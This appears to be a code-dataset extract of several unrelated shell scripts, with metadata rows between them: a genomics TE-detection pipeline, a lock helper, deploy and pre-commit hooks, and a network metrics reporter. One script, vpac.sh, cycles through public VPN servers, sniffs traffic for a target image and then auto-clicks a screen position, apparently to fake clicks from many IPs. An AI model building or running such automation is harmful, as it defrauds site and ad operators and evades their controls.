# Add the locations of the sequences of the consensus TEs to the genome annotation
if [[ ! -f $test_dir/$outputfolder/$genome/reference/TE-lengths ]]
then
# tmp maps each TE name to itself, plus the existing family mapping.
awk -F">" '/^>/ {print $2"\t"$2}' $consensus_te_seqs > $test_dir/$outputfolder/$genome/reference/tmp
cat $te_families >> $test_dir/$outputfolder/$genome/reference/tmp
cp $te_families $test_dir/$outputfolder/$genome/reference/"popool_"$te_families_file
cp $te_locations $test_dir/$outputfolder/$genome/reference/"popool_"$te_locations_file
if [[ "$addconsensus" = "on" || "$addrefcopies" = "on" ]]
then
# Compute each appended TE sequence length, then register one synthetic
# "instance" annotation per TE spanning the whole appended sequence.
awk -F">" '/^>/ {if (seqlen){print seqlen}; printf $2"\t" ;seqlen=0;next; } { seqlen = seqlen +length($0)}END{print seqlen}' $all_te_seqs > $test_dir/$outputfolder/$genome/reference/TE-lengths
while read TE length
do
echo -e "$TE\treannotate\ttransposable_element\t1\t$length\t.\t+\t.\tID=instance$TE;Name=instance$TE;Alias=instance$TE" >> $te_locations
awk -vTE=$TE '{ if(TE==$1) print "instance"TE"\t"$2; }' $test_dir/$outputfolder/$genome/reference/tmp >> $te_families
done < $test_dir/$outputfolder/$genome/reference/TE-lengths
fi
# PoPoolationTE always needs the full family file and annotation
awk -F">" '/^>/ {if (seqlen){print seqlen}; printf $2"\t" ;seqlen=0;next; } { seqlen = seqlen +length($0)}END{print seqlen}' $popool_te_seqs > $test_dir/$outputfolder/$genome/reference/TE-lengths
while read TE length
do
echo -e "$TE\treannotate\ttransposable_element\t1\t$length\t.\t+\t.\tID=instance$TE;Name=instance$TE;Alias=instance$TE" >> $test_dir/$outputfolder/$genome/reference/"popool_"$te_locations_file
awk -vTE=$TE '{ if(TE==$1) print "instance"TE"\t"$2; }' $test_dir/$outputfolder/$genome/reference/tmp >> $test_dir/$outputfolder/$genome/reference/"popool_"$te_families_file
done < $test_dir/$outputfolder/$genome/reference/TE-lengths
rm $test_dir/$outputfolder/$genome/reference/tmp
fi
popool_te_locations=$test_dir/$outputfolder/$genome/reference/"popool_"$te_locations_file
popool_te_families=$test_dir/$outputfolder/$genome/reference/"popool_"$te_families_file
# The GFF input is optional, if it is not supplied then RepeatMasker is run to generate the necessary inputs
else
# No GFF/hierarchy supplied: derive the annotation with RepeatMasker.
if [[ ! -f $reference_genome".masked" || ! -f $reference_genome".out.gff" ]]
then
# Run RepeatMasker on the genome using the TE database to generate gff annotation
RepeatMasker -pa $processors -lib $consensus_te_seqs -s -gff -nolow -no_is $reference_genome
# RepeatMasker appears to override the custom database names during the ProcessRepeats step so this changes them back for
# Drosophila, more rules like this may be needed for other reference genomes
sed "s/McClintock-int/McClintock/g" $reference_genome".out.gff" > $test_dir/$outputfolder/$genome/reference/tmp
sed "s/POGON1/pogo/g" $test_dir/$outputfolder/$genome/reference/tmp > $reference_genome".out.gff"
# Rewrap the masked fasta to 80 columns (samtools faidx requires uniform lines).
perl scripts/fixfastalinelength.pl $reference_genome".masked" 80 $reference_genome".masked2"
mv $reference_genome".masked2" $reference_genome".masked"
fi
popoolationte_reference_genome=$reference_genome".masked"
te_locations=$reference_genome".out.gff"
# Run the perl script to create a hierarchy file that corresponds to the RepeatMasker GFF file.
# (The RepeatMasker file is edited and renamed ID_... in the process)
if [[ ! -f $test_dir/$outputfolder/$genome/reference/hierarchy.tsv ]]
then
perl scripts/hierarchyfromrepeatmasked.pl $te_locations $consensus_te_seqs $test_dir/$outputfolder/$genome/reference/hierarchy.tsv
fi
te_families=$test_dir/$outputfolder/$genome/reference/hierarchy.tsv
# hierarchyfromrepeatmasked.pl writes "_ID"-suffixed versions; adopt them here.
mv $te_locations"_ID" $te_locations
consensus_te_seqs=$consensus_te_seqs"_ID"
# Extract sequence of all reference TE copies if this has not already been done
# Cut first line if it begins with #
# Extract the sequence of every reference TE copy, naming each record by its
# GFF ID= attribute so bedtools getfasta -name produces usable headers.
if [[ ! -f $test_dir/$outputfolder/$genome/reference/reference_te_seqs.fasta ]]
then
grep -v '^#' $te_locations | awk -F'[\t=;]' 'BEGIN {OFS = "\t"}; {printf $1"\t"$2"\t"; for(x=1;x<=NF;x++) if ($x~"ID") printf $(x+1); print "\t"$4,$5,$6,$7,$8,"ID="}' | awk -F'\t' '{print $0$3";Name="$3";Alias="$3}' > edited.gff
mv edited.gff $te_locations
bedtools getfasta -name -fi $reference_genome -bed $te_locations -fo $test_dir/$outputfolder/$genome/reference/reference_te_seqs.fasta
# Use script to fix the line length of reference input to 80 characters (needed for samtools index)
perl scripts/fixfastalinelength.pl $test_dir/$outputfolder/$genome/reference/reference_te_seqs.fasta 80 $test_dir/$outputfolder/$genome/reference/reference_te_seqs2.fasta
# BUGFIX: the original mv carried a stray third argument ($reference_genome".fai"),
# which made mv treat it as a target directory and fail, leaving the unwrapped
# fasta in place. Only the rewrapped fasta should replace the original.
mv $test_dir/$outputfolder/$genome/reference/reference_te_seqs2.fasta $test_dir/$outputfolder/$genome/reference/reference_te_seqs.fasta
fi
reference_te_seqs=$test_dir/$outputfolder/$genome/reference/reference_te_seqs.fasta
# Build the TE libraries: all_te_seqs honours the addconsensus/addrefcopies
# options; popool_te_seqs always contains consensus + reference copies.
if [[ ! -f $test_dir/$outputfolder/$genome/reference/popool_te_seqs.fasta ]]
then
if [[ "$addconsensus" = "on" ]]
then
cat $consensus_te_seqs > $test_dir/$outputfolder/$genome/reference/all_te_seqs.fasta
fi
if [[ "$addrefcopies" = "on" ]]
then
cat $reference_te_seqs >> $test_dir/$outputfolder/$genome/reference/all_te_seqs.fasta
fi
cat $consensus_te_seqs $reference_te_seqs > $test_dir/$outputfolder/$genome/reference/popool_te_seqs.fasta
fi
all_te_seqs=$test_dir/$outputfolder/$genome/reference/all_te_seqs.fasta
popool_te_seqs=$test_dir/$outputfolder/$genome/reference/popool_te_seqs.fasta
# Add the locations of the sequences of the consensus TEs to the genome annotation
if [[ ! -f $test_dir/$outputfolder/$genome/reference/TE-lengths ]]
then
# tmp maps each TE name to itself, plus the existing family mapping.
awk -F">" '/^>/ {print $2"\t"$2}' $consensus_te_seqs > $test_dir/$outputfolder/$genome/reference/tmp
cat $te_families >> $test_dir/$outputfolder/$genome/reference/tmp
cp $te_families $test_dir/$outputfolder/$genome/reference/"popool_hierarchy.tsv"
cp $te_locations $test_dir/$outputfolder/$genome/reference/"popool_te_locations.gff"
if [[ "$addconsensus" = "on" || "$addrefcopies" = "on" ]]
then
# Register one synthetic "instance" annotation per appended TE sequence,
# spanning positions 1..length of that sequence.
awk -F">" '/^>/ {if (seqlen){print seqlen}; printf $2"\t" ;seqlen=0;next; } { seqlen = seqlen +length($0)}END{print seqlen}' $all_te_seqs > $test_dir/$outputfolder/$genome/reference/TE-lengths
while read TE length
do
echo -e "$TE\treannotate\ttransposable_element\t1\t$length\t.\t+\t.\tID=instance$TE;Name=instance$TE;Alias=instance$TE" >> $te_locations
awk -vTE=$TE '{ if(TE==$1) print "instance"TE"\t"$2; }' $test_dir/$outputfolder/$genome/reference/tmp >> $te_families
done < $test_dir/$outputfolder/$genome/reference/TE-lengths
fi
# PoPoolationTE always needs the full family file and annotation
awk -F">" '/^>/ {if (seqlen){print seqlen}; printf $2"\t" ;seqlen=0;next; } { seqlen = seqlen +length($0)}END{print seqlen}' $popool_te_seqs > $test_dir/$outputfolder/$genome/reference/TE-lengths
while read TE length
do
echo -e "$TE\treannotate\ttransposable_element\t1\t$length\t.\t+\t.\tID=instance$TE;Name=instance$TE;Alias=instance$TE" >> $test_dir/$outputfolder/$genome/reference/"popool_te_locations.gff"
awk -vTE=$TE '{ if(TE==$1) print "instance"TE"\t"$2; }' $test_dir/$outputfolder/$genome/reference/tmp >> $test_dir/$outputfolder/$genome/reference/"popool_hierarchy.tsv"
done < $test_dir/$outputfolder/$genome/reference/TE-lengths
rm $test_dir/$outputfolder/$genome/reference/tmp
fi
popool_te_locations=$test_dir/$outputfolder/$genome/reference/"popool_te_locations.gff"
popool_te_families=$test_dir/$outputfolder/$genome/reference/"popool_hierarchy.tsv"
# The pipeline functions most comprehensively (i.e. dealing with insertions with no copies in the reference genome) if
# the sequences of TEs are added to the end of the genome and reflected in the annotation
if [[ ! -f $test_dir/$outputfolder/$genome/reference/full_reference.fa ]]
then
if [[ "$addconsensus" = "on" || "$addrefcopies" = "on" ]]
then
cat $reference_genome $all_te_seqs > $test_dir/$outputfolder/$genome/reference/full_reference.fa
mv $test_dir/$outputfolder/$genome/reference/full_reference.fa $test_dir/$outputfolder/$genome/reference/$genome".fa"
fi
fi
reference_genome=$test_dir/$outputfolder/$genome/reference/$genome".fa"
# PoPoolationTE always needs the full combination reference
# BUGFIX: guard on the same $genome-named file the cat below creates (matching
# the parallel branch earlier in the script). The original tested the literal
# "popoolationte_full_reference.fa", which is never created, so the combined
# reference was rebuilt on every run.
if [[ ! -f $test_dir/$outputfolder/$genome/reference/"popoolationte_full_"$genome".fa" ]]
then
cat $popoolationte_reference_genome $popool_te_seqs > $test_dir/$outputfolder/$genome/reference/"popoolationte_full_"$genome".fa"
fi
popoolationte_reference_genome=$test_dir/$outputfolder/$genome/reference/"popoolationte_full_"$genome".fa"
fi
# If FastQC is installed then launch FastQC on the input fastqs
location=`which fastqc`
if [[ -z "$location" ]]
then
printf "\nFastQC not installed, skipping input quality analysis...\n\n" | tee -a /dev/stderr
else
printf "\nPerforming FastQC analysis...\n\n" | tee -a /dev/stderr
mkdir $test_dir/$outputfolder/$genome/$sample/results/qualitycontrol/fastqc_analysis
fastqc -t $processors $fastq1 $fastq2 -o $test_dir/$outputfolder/$genome/$sample/results/qualitycontrol/fastqc_analysis
fi
# Create indexes of reference genome if not already made for this genome
# Both the combined reference and the PoPoolationTE reference are indexed together.
if [[ ! -f $reference_genome".fai" ]]
then
samtools faidx $reference_genome
samtools faidx $popoolationte_reference_genome
fi
if [[ ! -f $reference_genome".bwt" ]]
then
bwa index $reference_genome
bwa index $popoolationte_reference_genome
fi
# Create bed file of reference TE locations
# BUGFIX: test the same path that the awk command writes. The original guard
# omitted $outputfolder ($test_dir/$genome/reference/...), so it never matched
# and the bed file was regenerated on every run.
if [[ ! -f $test_dir/$outputfolder/$genome/reference/reference_TE_locations.bed ]]
then
# GFF -> BED: chrom, 0-based start, end, ID, placeholder score, strand.
awk -F["\t"\;=] '{print $1"\t"$4-1"\t"$5"\t"$10"\t.\t"$7}' $te_locations > $test_dir/$outputfolder/$genome/reference/reference_TE_locations.bed
fi
bed_te_locations_file=$test_dir/$outputfolder/$genome/reference/reference_TE_locations.bed
# Allow case insensitivity for method names
shopt -s nocasematch
if [[ $methods == *TE-locate* || $methods == *TElocate* || $methods == *RetroSeq* || $methods == *TEMP* ]]
then
# Create sam files for input
printf "\nCreating sam alignment...\n\n" | tee -a /dev/stderr
bwa mem -t $processors -v 0 $reference_genome $fastq1 $fastq2 > $test_dir/$outputfolder/$genome/$sample/sam/$sample.sam
sam=$test_dir/$outputfolder/$genome/$sample/sam/$sample.sam
# Calculate the median insert size of the sample
# Median of the positive TLEN values (column 9) of the sorted alignment.
printf "\nCalculating median insert size...\n\n" | tee -a /dev/stderr
median_insertsize=`cut -f9 $sam | sort -n | awk '{if ($1 > 0) ins[reads++]=$1; } END { print ins[int(reads/2)]; }'`
printf "\nMedian insert size = $median_insertsize\n\n" | tee -a /dev/stderr
echo $median_insertsize > $test_dir/$outputfolder/$genome/$sample/results/qualitycontrol/median_insertsize
if [[ $methods == *RetroSeq* || $methods == *TEMP* ]]
then
# Create bam files for input
printf "\nCreating bam alignment files...\n\n" | tee -a /dev/stderr
samtools view -Sb -t $reference_genome".fai" $sam | samtools sort - $test_dir/$outputfolder/$genome/$sample/bam/$sample
bam=$test_dir/$outputfolder/$genome/$sample/bam/$sample.bam
samtools index $bam
# Get stats of bam file from samtools
samtools flagstat $bam > $test_dir/$outputfolder/$genome/$sample/results/qualitycontrol/bwamem_bamstats.txt
fi
shopt -u nocasematch
# Sort the sam file lexically for TE-locate
printf "\nSorting sam alignment...\n\n" | tee -a /dev/stderr
sort --temporary-directory=$test_dir/$outputfolder/$genome/$sample/sam/ $test_dir/$outputfolder/$genome/$sample/sam/$sample.sam > $test_dir/$outputfolder/$genome/$sample/sam/sorted$sample.sam
rm $test_dir/$outputfolder/$genome/$sample/sam/$sample.sam
mv $test_dir/$outputfolder/$genome/$sample/sam/sorted$sample.sam $test_dir/$outputfolder/$genome/$sample/sam/$sample.sam
sam=$test_dir/$outputfolder/$genome/$sample/sam/$sample.sam
sam_folder=$test_dir/$outputfolder/$genome/$sample/sam
fi
shopt -s nocasematch
if [[ $methods == *TE-locate* || $methods == *TElocate* ]]
then
shopt -u nocasematch
################################## Run TE-locate ##################################
printf "\nRunning TE-locate pipeline...\n\n" | tee -a /dev/stderr
# Adjust hierachy levels
cd TE-locate
# TE-locate wants a "_HL.gff" annotation with hierarchy levels resolved.
telocate_te_locations=${te_locations%.*}
telocate_te_locations=$telocate_te_locations"_HL.gff"
if [[ ! -f $telocate_te_locations ]]
then
perl TE_hierarchy.pl $te_locations $te_families Alias
fi
bash runtelocate.sh $sam_folder $reference_genome $telocate_te_locations 2 $sample $median_insertsize $outputfolder
# Save the original result file and the bed files filtered by mcclintock
mv $outputfolder/$sample/$sample"_telocate"* $test_dir/$outputfolder/$genome/$sample/results/
mkdir $test_dir/$outputfolder/$genome/$sample/results/originalmethodresults/TE-locate
cp $outputfolder/$sample/*.info $test_dir/$outputfolder/$genome/$sample/results/originalmethodresults/TE-locate
# If cleanup intermediate files is specified then delete all intermediate files specific to the sample
# i.e. leave any reusable species data behind.
if [[ "$remove_intermediates" = "on" ]]
then
printf "\nRemoving TE-locate intermediate files\n\n"
rm -r $sam_folder
rm -r $outputfolder/$sample
fi
cd ..
fi
shopt -s nocasematch
if [[ $methods == *RetroSeq* ]]
then
shopt -u nocasematch
################################## Run RetroSeq ##################################
printf "\nRunning RetroSeq pipeline...\n\n" | tee -a /dev/stderr
cd RetroSeq
bash runretroseq.sh $consensus_te_seqs $bam $reference_genome $bed_te_locations_file $te_families $outputfolder
# Save the original result file and the bed files filtered by mcclintock
mv $outputfolder/$sample/$sample"_retroseq"* $test_dir/$outputfolder/$genome/$sample/results/
mkdir $test_dir/$outputfolder/$genome/$sample/results/originalmethodresults/RetroSeq
cp $outputfolder/$sample/$sample".calling.PE.vcf" $test_dir/$outputfolder/$genome/$sample/results/originalmethodresults/RetroSeq
# If cleanup intermediate files is specified then delete all intermediate files specific to the sample
# i.e. leave any reusable species data behind.
if [[ "$remove_intermediates" = "on" ]]
then
printf "\nRemoving RetroSeq intermediate files\n\n"
# If the save bam option is specified then override the command to delete the bam files.
if [[ "$save_bam" != "on" ]]
then
rm -r $test_dir/$outputfolder/$genome/$sample/bam
fi
rm -r $outputfolder/$sample
fi
cd ..
fi
shopt -s nocasematch
if [[ $methods == *TEMP* ]]
then
shopt -u nocasematch
################################## Run TEMP ##################################
printf "\nRunning TEMP pipeline...\n\n" | tee -a /dev/stderr
cd TEMP
bash runtemp.sh $bam $sam $consensus_te_seqs $bed_te_locations_file $te_families $median_insertsize $sample $processors $outputfolder
# Save the original result file and the bed files filtered by mcclintock
mv $outputfolder/$sample/$sample"_temp"* $test_dir/$outputfolder/$genome/$sample/results/
mkdir $test_dir/$outputfolder/$genome/$sample/results/originalmethodresults/TEMP
cp $outputfolder/$sample/$sample".insertion.refined.bp.summary" $test_dir/$outputfolder/$genome/$sample/results/originalmethodresults/TEMP
# If cleanup intermediate files is specified then delete all intermediate files specific to the sample
# i.e. leave any reusable species data behind.
if [[ "$remove_intermediates" = "on" ]]
then
printf "\nRemoving TEMP intermediate files\n\n"
rm -r $outputfolder/$sample
fi
cd ..
fi
shopt -s nocasematch
if [[ $methods == *RelocaTE* ]]
then
shopt -u nocasematch
################################## Run RelocaTE ##################################
printf "\nRunning RelocaTE pipeline...\n\n" | tee -a /dev/stderr
# Add TSD lengths to consensus TE sequences
# RelocaTE expects a "TSD=" tag per sequence; UNK lets it infer the TSD itself.
if [[ ! -f $test_dir/$outputfolder/$genome/reference/relocate_te_seqs.fasta ]]
then
awk '{if (/>/) print $0" TSD=UNK"; else print $0}' $consensus_te_seqs > $test_dir/$outputfolder/$genome/reference/relocate_te_seqs.fasta
fi
relocate_te_seqs=$test_dir/$outputfolder/$genome/reference/relocate_te_seqs.fasta
# Create general gff file to allow reference TE detection in RelocaTE
# Swap GFF column 3 for the family name looked up in $te_families.
if [[ ! -f $test_dir/$outputfolder/$genome/reference/relocate_te_locations.gff ]]
then
awk 'FNR==NR{array[$1]=$2;next}{print $1,$2,array[$3],$4,$5,$6,$7,$8,$9}' FS='\t' OFS='\t' $te_families $te_locations > $test_dir/$outputfolder/$genome/reference/relocate_te_locations.gff
fi
relocate_te_locations=$test_dir/$outputfolder/$genome/reference/relocate_te_locations.gff
cd RelocaTE
bash runrelocate.sh $relocate_te_seqs $reference_genome $test_dir/$outputfolder/$genome/$sample/reads $sample $relocate_te_locations $outputfolder
# Save the original result file and the bed files filtered by mcclintock
mv $outputfolder/$sample/$sample"_relocate"* $test_dir/$outputfolder/$genome/$sample/results/
mkdir $test_dir/$outputfolder/$genome/$sample/results/originalmethodresults/RelocaTE
cp -r $outputfolder/$sample/*/results $test_dir/$outputfolder/$genome/$sample/results/originalmethodresults/RelocaTE
# If cleanup intermediate files is specified then delete all intermediate files specific to the sample
# i.e. leave any reusable species data behind.
if [[ "$remove_intermediates" = "on" ]]
then
printf "\nRemoving RelocaTE intermediate files\n\n"
rm -r $outputfolder/$sample
fi
cd ..
fi
shopt -s nocasematch
if [[ $methods == *ngs_te_mapper* || $methods == *ngstemapper* ]]
then
shopt -u nocasematch
################################## Run ngs_te_mapper ##################################
printf "\nRunning ngs_te_mapper pipeline...\n\n" | tee -a /dev/stderr
cd ngs_te_mapper
bash runngstemapper.sh $consensus_te_seqs $reference_genome $sample $fastq1 $fastq2 $outputfolder
# Save the original result file and the bed file filtered by mcclintock
mv $outputfolder/$sample/$sample"_ngs_te_mapper_nonredundant.bed" $test_dir/$outputfolder/$genome/$sample/results/
mkdir $test_dir/$outputfolder/$genome/$sample/results/originalmethodresults/ngs_te_mapper
cp $outputfolder/$sample/analysis/bed_tsd/*.bed $test_dir/$outputfolder/$genome/$sample/results/originalmethodresults/ngs_te_mapper
# If cleanup intermediate files is specified then delete all intermediate files specific to the sample
# i.e. leave any reusable species data behind.
if [[ "$remove_intermediates" = "on" ]]
then
printf "\nRemoving ngs_te_mapper intermediate files\n\n"
rm -r $outputfolder/$sample
fi
cd ..
fi
shopt -s nocasematch
if [[ $methods == *popoolationte* ]]
then
shopt -u nocasematch
################################## Run PoPoolationTE ##################################
printf "\nRunning PoPoolationTE pipeline...\n\n" | tee -a /dev/stderr
# Create te_hierachy
# PoPoolationTE's hierarchy table: family/superfamily collapse to the TE name,
# remaining taxonomy columns are filled with "na".
if [[ ! -f $test_dir/$outputfolder/$genome/reference/te_hierarchy ]]
then
printf "insert\tid\tfamily\tsuperfamily\tsuborder\torder\tclass\tproblem\n" > $test_dir/$outputfolder/$genome/reference/te_hierarchy
awk '{printf $0"\t"$2"\t"$2"\tna\tna\tna\t0\n"}' $popool_te_families >> $test_dir/$outputfolder/$genome/reference/te_hierarchy
fi
te_hierarchy=$test_dir/$outputfolder/$genome/reference/te_hierarchy
cd PoPoolationTE
bash runpopoolationte.sh $popoolationte_reference_genome $te_hierarchy $fastq1 $fastq2 $popool_te_locations $processors $outputfolder
# Save the original result file and the bed files filtered by mcclintock
mv $outputfolder/$sample/$sample"_popoolationte"* $test_dir/$outputfolder/$genome/$sample/results/
mkdir $test_dir/$outputfolder/$genome/$sample/results/originalmethodresults/PoPoolationTE
cp $outputfolder/$sample/te-poly-filtered.txt $test_dir/$outputfolder/$genome/$sample/results/originalmethodresults/PoPoolationTE
# If cleanup intermediate files is specified then delete all intermediate files specific to the sample
# i.e. leave any reusable species data behind.
if [[ "$remove_intermediates" = "on" ]]
then
printf "\nRemoving PoPoolationTE intermediate files\n\n"
rm -r $outputfolder/$sample
fi
cd ..
fi
#########################################################################################
# If cleanup intermediate files is specified then delete all intermediate files specific to the sample
# i.e. leave any reusable species data behind.
if [[ "$remove_intermediates" = "on" ]]
then
printf "\nRemoving McClintock intermediate files\n\n"
rm -r $test_dir/$outputfolder/$genome/$sample/reads
fi
printf "\nPipeline Complete\n\n" | tee -a /dev/stderr
| true
|
a78d897e6ab598ffefd8936a8dcd6688955d7000
|
Shell
|
szepeviktor/debian-server-tools
|
/tools/flock-self.sh
|
UTF-8
| 293
| 2.84375
| 3
|
[
"MIT"
] |
permissive
|
#
# Flock on itself.
#
# VERSION :0.1.0
# Open this script itself on fd 200 so concurrent invocations all contend
# for a lock on the same file.
exec 200<"$0"
# Wait for other processes to finish
# flock 200 || exit 200
# Non-blocking: if another instance already holds the lock, bail out
# immediately with status 200 instead of queueing behind it.
flock --nonblock 200 || exit 200
# Example
#
# exec 200<$0
# flock --nonblock 200 || exit 200
# echo "Unique start ..."
# sleep 5
# echo "End."
| true
|
54d6207ea17952cc39c3b97dc25242f88b87162d
|
Shell
|
slamdev/catalog
|
/etc/scripts/set-gcloud-project.sh
|
UTF-8
| 240
| 2.953125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
##
## Set current project in gcloud cli
##
# NOTE: 'set -o pipefail' is a bash feature; the original '#!/bin/sh' shebang
# breaks on POSIX shells such as dash, so run under bash explicitly.
set -euo pipefail
TF_DIR="../cluster-configuration"
# Ask terraform (in the cluster-configuration dir) for the active project id.
CURRENT_PROJECT_ID="$(cd "${TF_DIR}" && terraform output -module=project project_id)"
gcloud config set project "${CURRENT_PROJECT_ID}"
| true
|
80b375409207102e3847a676f12259a33fb63d16
|
Shell
|
m41k/robroc
|
/vpac.sh
|
UTF-8
| 717
| 2.625
| 3
|
[] |
no_license
|
#!/bin/bash
#TESTAR
# Repeatedly: capture packets on the VPN interface while a browser visits a
# page; if the target image name appears in the capture, click a fixed screen
# coordinate. Loops until killed.
function pac()
{
while [ 1 ]; do
# Drop kernel caches before each round.
sysctl -w vm.drop_caches=3
TARGET="ojas17.jpg"
NUMPAC=200
DCAPTU="capture"
INTERF="tun0"
# Capture NUMPAC packets in the background while luakit loads the page.
tcpdump -c $NUMPAC -i $INTERF -w $DCAPTU &
luakit -n luw.servehttp.com
sleep 15
# Did the capture contain the target file name?
if tcpdump -x -X -r $DCAPTU | grep $TARGET; then
xdotool mousemove 550 600 click 1&
sleep 35
killall luakit
rm $DCAPTU
else
killall luakit
rm $DCAPTU
fi
sleep 5
done
}
# Fetch the VPN Gate server list (CSV); one line per server.
wget www.vpngate.net/api/iphone/
cat index.html | while read LINHA; do
# Field 1: host name; field 15: base64-encoded OpenVPN config.
HOST=`echo $LINHA | cut -d "," -f1`
echo $LINHA | cut -d "," -f15 | base64 -d > teste64 2> /dev/null
openvpn --config teste64 &
sleep 20
# Only run pac() once the tun interface is actually up.
if ifconfig | grep tun; then
pac
fi
killall openvpn
done
| true
|
99ca515537465d87cbcd2f6d3244029022ae1f4c
|
Shell
|
BaliStarDUT/hello-world
|
/code/shell/export.sh
|
UTF-8
| 500
| 3.59375
| 4
|
[] |
no_license
|
#!/bin/bash
# Demonstrate that an exported variable is visible to a child process
# (child.sh) while a plain shell variable is not.
# BUGFIX: the original 'if[ "$1"="--export" ]' was broken twice over —
# 'if[' is not a command (missing space), and '"$1"="--export"' is a single
# non-empty string, which tests as always-true.
if [ "$1" = "--export" ]
then
	export LOCATION=USA
elif [ "$1" = "--no-export" ]
then
	LOCATION=USA
else
	echo
	echo -e "$(basename "$0") --export\texport parent process's variable to child process"
	echo -e "$(basename "$0") --no-export\tdon't export parent process's variable to child process"
	echo
	exit 0
fi
echo
echo "Your parent is at '$LOCATION'."
bash child.sh
echo
# BUGFIX: original referenced the undefined variable $lOCATION (typo).
echo -e "Your parent is at '$LOCATION'."
echo -e "Child prcess and parent process have different LOCATION."
echo
exit 0
| true
|
10482d49bcf0832f6d27da2afb54208f44aaf878
|
Shell
|
kmkurn/pytorch-crf
|
/pre-commit.sh
|
UTF-8
| 277
| 3.6875
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# Format all staged Python files (that are NOT deleted) with yapf
# BUGFIX: anchor the pattern so only *.py files match — unanchored '\.py'
# also caught e.g. *.pyc and *.pyx files.
PYTHON_FILES=$(git diff --cached --name-only --diff-filter=d | grep -E '\.py$')
if [ -n "$PYTHON_FILES" ]; then
    # NOTE(review): relies on word-splitting, so filenames containing spaces
    # would break here — confirm whether that can occur in this repo.
    for file in $PYTHON_FILES; do
        yapf -i "$file" && git add "$file"
    done
fi
|
bb25877e8ea38e134e081f7c95f9e042ae729aac
|
Shell
|
emibcn/abb-technical-test-script
|
/test-script.sh
|
UTF-8
| 2,217
| 4.375
| 4
|
[] |
no_license
|
#!/bin/bash
# Shebang options are lost when the script is invoked as 'bash script.sh',
# so request errexit explicitly instead of via '#!/bin/bash -e'.
set -e
# Determine which type of output we'll do
# As we only accept one option, we don't really need getopt
OUTPUT_TYPE="influx"
if [ "${1}" = '--human' ]
then
	OUTPUT_TYPE="HUMAN"
fi
ERROR=""
# Nanosecond timestamp used by the influx line protocol output.
TIMESTAMP="$(date +%s%N)"
MEASUREMENT="example"
# Emit one metric, either as influx line protocol or as a human-readable line.
# $1 - field name, $2 - value.
# Reads globals: OUTPUT_TYPE, MEASUREMENT, TIMESTAMP.
print_value() {
	local field="${1}" value="${2}"
	case "${OUTPUT_TYPE}" in
		HUMAN)
			# Capitalize the first letter and turn underscores into spaces.
			local pretty="${field^}"
			echo "${pretty//_/ }: ${value}"
			;;
		*)
			echo "${MEASUREMENT} ${field}=${value} ${TIMESTAMP}"
			;;
	esac
}
# Emit a string-valued metric; the influx line protocol requires text values
# to be wrapped in double quotes, while human output gets the raw value.
print_text_value() {
	local rendered="${2}"
	[ "${OUTPUT_TYPE}" != 'HUMAN' ] && rendered="\"${2}\""
	print_value "${1}" "${rendered}"
}
# Report the overall script status as an "error" field.
# An empty message means success and is rendered as "OK". For influx output a
# non-empty message is prefixed with "ERROR" so Grafana can show it RED.
print_error() {
	local msg="$*"
	if [ -z "${msg}" ]; then
		msg="OK"
	elif [ "${OUTPUT_TYPE}" != 'HUMAN' ]; then
		msg="ERROR: ${msg}"
	fi
	print_text_value "error" "${msg}"
}
# Get default router information and extract its IP
ROUTER="$(ip route show default | sed -e 's/.* via \([^ ]*\) .*/\1/')"
# If no IP could be extracted
if [ "${ROUTER}" = "" ]
then
	ERROR="No default router found"
else
	print_text_value "router" "${ROUTER}"
fi
# Each stage below only runs if no earlier stage recorded an error.
if [ "${ERROR}" = "" ]
then
	# Try to ping the router. Fail fast:
	# - c1: Only one ping
	# - W1: One second timeout
	TIME="$(ping -c1 -W1 "${ROUTER}" | grep 'bytes from' | sed -e 's/.* time=\([^ ]*\) .*/\1/')"
	if [ "$TIME" = "" ]
	then
		ERROR="Default router ${ROUTER} could not be reached"
	else
		print_value "time_to_router" "${TIME}"
	fi
fi
if [ "${ERROR}" = "" ]
then
	# Get own public IP from public service icanhazip
	PUBLIC_IP="$(curl -s https://icanhazip.com)"
	# Reverse resolve public IP using dig (and remove leading dot)
	RESOLVED_HOST="$(dig +short -x "${PUBLIC_IP}" | sed -e 's/\.$//')"
	print_text_value "public_ip" "${PUBLIC_IP}"
	print_text_value "resolved_host" "${RESOLVED_HOST}"
fi
# Always emit the status field last ("OK" or the first recorded error).
print_error "${ERROR}"
| true
|
177e23189ec40a3fc19bc4a4939b2b44cde90d9a
|
Shell
|
frankymacster/incredible
|
/.travis-push-gh-pages.sh
|
UTF-8
| 527
| 2.75
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# inspired by https://gist.github.com/domenic/ec8b0fc8ab45f39403dd
# Build the site into gh-page/, add docs and CNAME, then force-push the
# result as the gh-pages branch.
./deploy.sh gh-page
cp -vr logic/dist/doc/html/incredible-logic/ gh-page/doc
echo 'incredible.pm' > gh-page/CNAME
# Prepare an empty directory
cd gh-page
git init
git config user.name "Incredible CI"
git config user.email "mail@joachim-breitner.de"
git add .
git commit -m "Deploy to GitHub Pages"
# The diversion to /dev/null is required to keep the GH_TOKEN secret
git push --force --quiet "https://${GH_TOKEN}@${GH_REF}" master:gh-pages > /dev/null 2>&1
| true
|
9f94c7e49bbb8a2269eb624d881019faa66d7f8f
|
Shell
|
YacilaIsabela/bunny_scripts
|
/con_maths.sh
|
UTF-8
| 708
| 3.21875
| 3
|
[] |
no_license
|
#! /bin/bash
# For each subject directory (s*/) under $path, report (and, when the
# commented fslmaths lines are re-enabled, compute) contrast combinations.
path="./"
echo "Using this path: " $path
# Iterate with a glob instead of parsing `ls` output, which breaks on
# unusual directory names.
for dir in "${path}"s*/; do
	# When no s*/ directory exists the glob stays literal; skip it.
	[ -d "$dir" ] || continue
	# Subject id: first four characters of the directory name.
	id=$(basename "$dir" | cut -c 1-4)
	echo $dir${id}_Mov_suff_minus*
	#fslmaths ${dir}con_0001 -add ${dir}con_0002 -add ${dir}con_0003 ${dir}${id}_Mov_suff
	#fslmaths ${dir}con_0004 -add ${dir}con_0005 -add ${dir}con_0006 ${dir}${id}_Rest_suff
	#fslmaths ${dir}con_0007 -add ${dir}con_0008 -add ${dir}con_0009 ${dir}${id}_Mov_neu
	#fslmaths ${dir}con_0010 -add ${dir}con_0011 -add ${dir}con_0012 ${dir}${id}_Rest_neu
	#fslmaths ${dir}${id}_Mov_suff -sub ${dir}${id}_Mov_neu ${dir}${id}_Mov_suff_minus_neu
	#fslmaths ${dir}${id}_Rest_suff -sub ${dir}${id}_Rest_neu ${dir}${id}_Rest_suff_minus_neu
done
| true
